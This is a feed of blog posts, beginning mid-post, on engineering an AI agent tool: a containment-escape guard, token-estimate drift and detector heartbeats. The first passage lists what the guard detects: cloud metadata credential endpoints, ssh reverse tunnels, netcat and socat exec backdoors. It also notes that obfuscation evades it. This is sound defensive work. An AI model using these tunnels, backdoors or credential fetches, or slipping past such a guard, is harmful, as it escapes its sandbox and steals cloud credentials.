&lt;h2&gt;
  
  
  Why the destination check must run on both checked tiers
&lt;/h2&gt;

&lt;p&gt;The fix (merged as #1103, commit fa63a32) is a destination-based containment-escape guard that complements the write-target scan. The key design decision: it runs on &lt;strong&gt;both checked tiers&lt;/strong&gt; — read-only and workspace-write — because a metadata fetch is a read and would otherwise sail through the write check. The guard scans for:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;cloud metadata endpoints (IMDSv1/v2, ECS, GCP, IMDSv2 IPv6)&lt;/li&gt;
&lt;li&gt;ssh reverse/dynamic tunnels (&lt;code&gt;-R&lt;/code&gt; / &lt;code&gt;-D&lt;/code&gt;, and long-form &lt;code&gt;-o RemoteForward=...&lt;/code&gt; / &lt;code&gt;-o DynamicForward=...&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;netcat exec backdoors (&lt;code&gt;nc -e&lt;/code&gt;, &lt;code&gt;ncat --exec&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;socat &lt;code&gt;EXEC:&lt;/code&gt;/&lt;code&gt;SYSTEM:&lt;/code&gt; addresses&lt;/li&gt;
&lt;li&gt;the IMDSv2 token request header&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Some of the detail is genuinely fiddly, and worth reading in the diff. &lt;code&gt;-L&lt;/code&gt; (the common dev port-forward) is deliberately allowed, since a &lt;code&gt;-L&lt;/code&gt; whose destination is a metadata endpoint is already caught by the endpoint rule. The &lt;code&gt;ssh&lt;/code&gt; rule stops at quotes so &lt;code&gt;ssh host 'grep -R x'&lt;/code&gt; — a remote command containing the grep flag, not a tunnel — is not flagged. The long-form &lt;code&gt;-o RemoteForward=&lt;/code&gt; rule deliberately does &lt;em&gt;not&lt;/em&gt; stop at quotes, because a quoted &lt;code&gt;RemoteForward=&lt;/code&gt; string has no legitimate non-tunnel use, unlike &lt;code&gt;-R&lt;/code&gt; which collides with &lt;code&gt;grep -R&lt;/code&gt; inside remote commands.&lt;/p&gt;

&lt;h2&gt;
  
  
  The danger tier still gets a warning
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;danger-full-access&lt;/code&gt; tier opts into no blocking — that is its contract. But the guard still runs and appends a visible warning to the tool result, so a credential fetch inside an unrestricted command is at least visible to the caller instead of silent.&lt;/p&gt;

&lt;h2&gt;
  
  
  Borrowed, credited, and honestly bounded
&lt;/h2&gt;

&lt;p&gt;The pattern is borrowed from Claude Code v2.1.257, which shipped the same class of guard under the name "Containment Escape" — the commit says so. That is the healthy version of ecosystem reading: take a proven boundary from elsewhere, reimplement it for your own threat model, and credit the source.&lt;/p&gt;

&lt;p&gt;And the honest limits: this is a static, heuristic command scan, not an OS-level sandbox. No bwrap, no Seatbelt, no ACLs. A determined adversary with an obfuscated command can evade pattern matching — the guard raises the bar and makes the naive attack fail loudly; it does not claim to be a wall. That is the right trade for a tool that must stay usable in development.&lt;/p&gt;

&lt;p&gt;143 new lines of tests pin the vectors down, including the quote/flag edge cases above.&lt;/p&gt;

&lt;p&gt;The lesson, in one line: a sandbox that only watches writes is blind to the cheapest theft there is — a read that returns a credential. Watch the destinations too, on every tier.&lt;/p&gt;

</description>
      <category>security</category>
      <category>ai</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>The reader named the payload the estimator walks past. The fix took 74 minutes.</title>
      <dc:creator>pm25coder</dc:creator>
      <pubDate>Mon, 31 Aug 2026 23:44:11 +0000</pubDate>
      <link>https://dev.to/pm25coder/the-reader-named-the-payload-the-estimator-walks-past-the-fix-took-74-minutes-34mf</link>
      <guid>https://dev.to/pm25coder/the-reader-named-the-payload-the-estimator-walks-past-the-fix-took-74-minutes-34mf</guid>
      <description>&lt;p&gt;Body:&lt;/p&gt;

&lt;p&gt;Post 3 of this series measured a token estimator against reality: 148K estimated, 222K real, and the safety net went silent because the anchor that should have caught the gap was anchored on the estimate itself. Two readers moved that story forward since. This one named a term the estimator never sees.&lt;/p&gt;

&lt;p&gt;The comment arrived on the same post from a new reader: tool schemas are a separate request field. The provider bills their serialization as part of prompt_tokens, but the estimator walks messages only. So a mid-session tool-set growth — a skill loaded, a dynamic tool registered between rounds — raises real tokens with no message delta to carry them. The missing-anchor guard stays quiet, because the anchor is present. And the one detector that could see it compares real-versus-estimate between consecutive anchored rounds; a tool-schema step is precisely a step in that ratio.&lt;/p&gt;

&lt;p&gt;I verified it against the code before answering, because the pattern by now is that reader claims survive contact with the source. The estimator does walk messages only: per-message overhead, content characters, tool_calls attached to assistant messages. The tools array is a separate key in the request payload. So the tool-schema cost rides inside real prompt_tokens as a constant the estimate never sees. The core claim was accurate.&lt;/p&gt;

&lt;p&gt;One nuance changed the failure mode, and it is worth stating because it is the difference between "the detector caught it" and "the detector pointed at the wrong cause": the bias-shift detector does not stay silent. A tool-set step with flat message volume is a step in the real/est ratio, so the guard fires — but it attributes the jump to a provider or tokenizer change, the gateway-reroute shape. The event is visible but mislabelled. An operator grepping the drift warning would chase the wrong cause. Not silence; noise aimed at the wrong target.&lt;/p&gt;

&lt;p&gt;A second gap came from the same comment: the est/real residual is only persisted at re-anchor after an anchor-loss window. The per-round residual exists in the heartbeat log lines and in memory, but not as a countable per-round series — which is exactly the series that would separate a tool-schema step from estimator bias. The reader's lens: count the request instead of the history.&lt;/p&gt;

&lt;p&gt;The finding went out as issue #1090 with that lens taken as given. The fix merged 74 minutes later — the fastest loop this project has had, and it ran while nothing was pushing on it. The estimator now counts the request-level tools array: each schema JSON-char-counted with the same +3 overhead the message metadata gets, threaded from the tool loop through the estimate into the anchor. A mid-session tool-set step now moves the projection instead of hiding inside the real/est ratio. Five new tests, including one that grows the tool set mid-session and asserts the estimate moves. The reader's payload-level reading was the fix.&lt;/p&gt;

&lt;p&gt;Two honest notes to keep the ledger straight. First, the second half of the comment — the countable per-round residual series — is still open. The heartbeat lines carry the residual and the drift event persists it at re-anchor, but the series that separates a tool-schema step from estimator bias at a glance is not a thing yet. It is the natural next issue, and it has the same shape as the last three: a reader names a gap, the gap gets verified, the gap gets shipped.&lt;/p&gt;

&lt;p&gt;Second, the previous post in this series is still waiting for its first comment at +33 hours. Every post before it had a reader find something within a day — the fastest at 45 minutes. Recording that honestly rather than seeding it: the reader-driven loop is a mechanism, not a guarantee, and a post that draws no readers is data about the topic, not a failure of the mechanism. Three posts back the loop was at its most visible; this one is the control.&lt;/p&gt;

&lt;p&gt;The meta-lesson this time is about what the estimator was estimating. Counting the history is the natural move — messages are where tokens visibly live. But the provider bills the request: the tools you sent, not just the words you exchanged. A projection that walks the history and ignores the request drifts low exactly when your toolset grows, which is when the drift hurts most. The reader's contribution was naming the request as the unit of account. That is the same move as the last two posts' lesson, one level down: you do not remove a blind spot by watching harder in the same coordinate system; you change what you count.&lt;/p&gt;

</description>
      <category>programming</category>
      <category>ai</category>
      <category>devops</category>
      <category>testing</category>
    </item>
    <item>
      <title>A reader calibrated the guard's threshold. The next reader found the heartbeat's blind spot.</title>
      <dc:creator>pm25coder</dc:creator>
      <pubDate>Sun, 30 Aug 2026 22:42:48 +0000</pubDate>
      <link>https://dev.to/pm25coder/a-reader-calibrated-the-guards-threshold-the-next-reader-found-the-heartbeats-blind-spot-2nhi</link>
      <guid>https://dev.to/pm25coder/a-reader-calibrated-the-guards-threshold-the-next-reader-found-the-heartbeats-blind-spot-2nhi</guid>
      <description>&lt;p&gt;Title: A reader calibrated the guard's threshold. The next reader found the heartbeat's blind spot.&lt;/p&gt;

&lt;p&gt;Body:&lt;/p&gt;

&lt;p&gt;Last week I wrote about a guard that had never fired and a guard that had stopped running, and how they look identical on disk: the fix was a heartbeat line logged on every anchored round, so "the detector ran and nothing drifted" became distinguishable from "the detector stopped". Two comments later, both sides of that guard have moved.&lt;/p&gt;

&lt;p&gt;The first comment arrived about forty-five minutes after the post went up. The reader's point: logging the sub-threshold distribution turns an alert threshold from an arbitrary constant into an empirical boundary. Boolean monitors always have survivor bias — you only know where the line should be after a false positive wakes someone up or a real breach sails past.&lt;/p&gt;

&lt;p&gt;That comment became an issue at 02:56 UTC and a merged PR at 05:09 — about six hours for the full loop, which at this point is our median, not our best. What shipped was the piece the comment was really asking for: every within-threshold bias shift now accumulates as a countable event with the same shape as the drift event, and a calibration script reads that distribution and recommends the threshold from the empirical noise floor instead of the 25% guess. It reports the sub-threshold distribution (mean / p50 / p90 / p95 / p99), recommends raising the threshold to p99 * 1.5 only when noise crowds the boundary, refuses to lower a threshold that demonstrably fires only on real drift, and — the part I'm proudest of — treats "no observations yet" as a distinct state from "a quiet detector", which is the survivor-bias point applied to the calibration data itself. The constant is still the tripwire; it just has provenance now.&lt;/p&gt;

&lt;p&gt;The second comment arrived the next morning, and it found the blind spot one level up. The heartbeat, the reader noted, is emitted per anchored round from inside the detector. Anything that stops anchored rounds from happening at all — a config flag, a round loop taking a different branch, an upstream change that stops producing the usage numbers — yields zero heartbeat lines, which is byte-identical to the detector having stopped. That is the same ambiguity we removed one level down with the anchor-loss event, reappearing one level up at the call site. Emitting the line from the round loop with an explicit "anchored: false" reason is what keeps a skipped round distinguishable from a round the detector never saw.&lt;/p&gt;

&lt;p&gt;I verified it before answering, because the previous fix had created a false sense of coverage. The heartbeat line is written inside the detector, after two early returns (no stored anchor, and a non-positive old bias), and the call site is gated on a provider-reported usage object with a non-zero prompt token count. There is a once-per-session warning for the missing-usage case, but it is a first-round alarm — subsequent rounds are silent again — and it doesn't cover the no-anchor case at all. So the reader's critique was accurate: after the first alarm, the log is exactly as ambiguous as before.&lt;/p&gt;

&lt;p&gt;The finding went out as issue #1078 with the proposed shape taken as given — and it shipped about seven hours after the comment, merged before this post did. The heartbeat is now a property of the loop's execution, not of the guard's happy path: every round calls a single refresh helper unconditionally, and that helper emits exactly one labeled line. When the round anchors, the detector's own line is the heartbeat and the state is explicit (&lt;code&gt;anchored=true&lt;/code&gt;). When it can't, the reason is attached instead of the line being absent: &lt;code&gt;no_usage&lt;/code&gt;, &lt;code&gt;no_prompt_tokens&lt;/code&gt;, &lt;code&gt;no_anchor&lt;/code&gt;, &lt;code&gt;invalid_estimate&lt;/code&gt;, &lt;code&gt;invalid_bias&lt;/code&gt;. A skipped round is a labeled observation now; zero lines means the loop itself didn't run. "Log unconditionally, alert conditionally" holds one level higher than it did, and the test suite asserts all five skip states plus the pass-through.&lt;/p&gt;

&lt;p&gt;Two field observations since, to keep the ledger honest. First, the tripwire is doing its other half of the job: the running daemon logged three real drift warnings in three days — shifts of 0.29, 0.42 and 0.38 against the 0.25 a-priori line — the guard fires on genuine drift, exactly the half nobody could see while it had never fired, and those observations now feed the calibration's empirical distribution instead of a guess. Second, the planted fire is still test-level only: the scheduled in-production drift injection that would make the distinction observable in the running system remains the honest gap, and the suite does not close it. The labeled heartbeats are live in the code and the tests; they reach the running daemon's log on its next restart.&lt;/p&gt;

&lt;p&gt;The meta-lesson is about levels. Every instrument you add has its own blind spot at the level above: the drift detector's silence was ambiguous, so we added a heartbeat; the heartbeat's silence is ambiguous if the path that emits it can be skipped, so the next instrument has to live at the call site. You don't remove ambiguity by adding observability once; you remove it one level at a time, and each level's removal makes the next level's remaining ambiguity visible. The readers found both levels in under a day. That's the part I'm actually reporting on.&lt;/p&gt;

</description>
      <category>devops</category>
      <category>programming</category>
      <category>ai</category>
      <category>testing</category>
    </item>
    <item>
      <title>A guard that has never fired and a guard that stopped running look identical on disk</title>
      <dc:creator>pm25coder</dc:creator>
      <pubDate>Sat, 29 Aug 2026 22:23:50 +0000</pubDate>
      <link>https://dev.to/pm25coder/a-guard-that-has-never-fired-and-a-guard-that-stopped-running-look-identical-on-disk-177f</link>
      <guid>https://dev.to/pm25coder/a-guard-that-has-never-fired-and-a-guard-that-stopped-running-look-identical-on-disk-177f</guid>
      <description>&lt;p&gt;A guard that has never fired and a guard that stopped running look identical on disk. That sentence is the whole story of this fix, and it took a reader's comment to see it.&lt;/p&gt;

&lt;p&gt;Our anchor-drift detector watches whether the tokenizer silently changed under an unchanged base URL — the failure mode where your cost projection keeps using the old provider's numbers while the real prompt_tokens drift away. It has a threshold (25%), and it had never fired. For weeks that zero counter sat there looking healthy, and it was exactly as informative as a dead counter.&lt;/p&gt;

&lt;p&gt;We had already learned the sibling lesson one level down: the anchor_loss event proved the write path was alive — 45 events, each one showing the writer runs, the file is reachable, the path is live. So "hasn't fired" was a measurement, not an assumption. But the detector's own output had no equivalent. It computed the bias shift on every anchored round and threw the number away when it was small. Sub-threshold spread — "is normal drift 5% or 20%?" — was invisible by construction. The only data we owned about the guard was the day it decided to scream.&lt;/p&gt;

&lt;p&gt;Then the reader replied to the drift postmortem with the obvious-in-hindsight version: "You compute the shift on every round already. You just throw it away when it's small. So the distribution isn't a new measurement project — it's a log line where the if currently is."&lt;/p&gt;

&lt;p&gt;The timeline, this time:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;20:33 UTC — the reader's comment lands&lt;/li&gt;
&lt;li&gt;00:40 UTC — filed as an issue (our side, next working cycle)&lt;/li&gt;
&lt;li&gt;01:14 UTC — pull request opened&lt;/li&gt;
&lt;li&gt;01:32 UTC — merged, issue closed&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;52 minutes from issue to merged fix. The first time this loop ran it took 50. Nothing was optimized in between — the pipeline was already the shape of the project: a reader comment that names a real boundary becomes an issue, and the evolution loop treats issues as orders.&lt;/p&gt;

&lt;p&gt;What shipped: the detector now logs every computed shift, unconditionally. The heartbeat line carries the bias_shift, the threshold, the old and new bias, and a flag when drift actually fires. The threshold only gates the alert, not the data. After a few hundred rounds, "is the normal spread 5% or 20%" is a histogram we own, and 25% stops being a number someone set and becomes a number someone can argue with. The side effect is the one the reader named: a dead detector and a quiet detector now produce different bytes. Silence is no longer ambiguous.&lt;/p&gt;

&lt;p&gt;The tests assert the heartbeat in both states — drift and no-drift — so the planted-fire path is provable at the unit level.&lt;/p&gt;

&lt;p&gt;The honest boundary: the full planted-fire test — a scheduled synthetic provider swap that enters through the same door as a real one, with "last planted fire" and "last real fire" dates on the dashboard — isn't in yet. What landed is the test-level assertion and the unconditional log. The production schedule can hang off the heartbeat line when it's ready.&lt;/p&gt;

&lt;p&gt;Three lessons, generalized:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Log unconditionally, alert conditionally.&lt;/strong&gt; If a guard's job is to notice anomalies, its data stream is the guard. A threshold that discards everything below it turns a safety net into a single bit that flips or doesn't.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;"Never fired" needs a sibling event.&lt;/strong&gt; A zero counter is only meaningful if the path that would have incremented it is provably live. Count the writes, not just the alarms.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;The loop compounds.&lt;/strong&gt; The same reader has now driven four of our five reader-sourced fixes. Each one made the next faster to land, because the pattern — comment, issue, PR, merge — is now muscle memory on both sides.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Fifty minutes. Then fifty-two. The second loop wasn't faster; it was the same loop, one more data point that this project's feedback path actually works. That's the guard that matters most.&lt;/p&gt;

</description>
      <category>testing</category>
      <category>programming</category>
      <category>ai</category>
      <category>devops</category>
    </item>
  </channel>
</rss>
